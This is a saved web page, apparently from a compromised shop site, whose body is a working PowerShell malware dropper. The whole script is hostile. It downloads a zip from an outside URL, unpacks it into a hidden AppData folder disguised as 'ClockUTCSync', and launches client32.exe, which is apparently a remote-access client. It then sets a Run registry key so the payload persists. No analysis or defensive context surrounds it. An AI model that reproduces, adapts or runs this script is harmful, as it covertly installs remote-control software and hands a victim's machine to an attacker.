<!-- saved from url=(0039)https://www.snappyshop.it/img/docse.php -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"></head><body>cd $env:AppData; $linok='https://www.snappyshop.it/img/index.php'; $rnums=Get-Random -minimum 5 -maximum 9; $r_rnum=Get-Random -minimum 1051 -maximum 8989; $chrs='abcdefgjklmntuvwxyzABCDEFGHILMNOTUWXYZ1256890'; $r_strng=''; $ran=New-Object System.Random; for ($i=0; $i -lt $rnums; $i++) {$r_strng+=$chrs[$ran.next(0, $chrs.Length)]}; $rzip=$r_strng+'.zip'; $path=$env:APPDATA+'\'+$rzip; $pezip_=$env:APPDATA+'\ClockUTCSync_'+$r_rnum; Start-BitsTransfer -Source $linok -Destination $Path; expand-archive -path $path -destinationpath $pezip_; $FOLD=Get-Item $pezip_ -Force; $FOLD.attributes='Hidden'; Remove-Item -path $path; cd $pezip_; start client32.exe; $fstrng=$pezip_+'\client32.exe'; $ranome='ClockUTCSync_'+$r_rnum; New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name $ranome -Value $fstrng -PropertyType 'String'; #rg-1iGqMCFs5us0h8x6K-y-KXA3p3Mc7X12TI*h_KecQ1s+22HKqPCrSq)9jyY#Etcjn!rjvCJ+ER&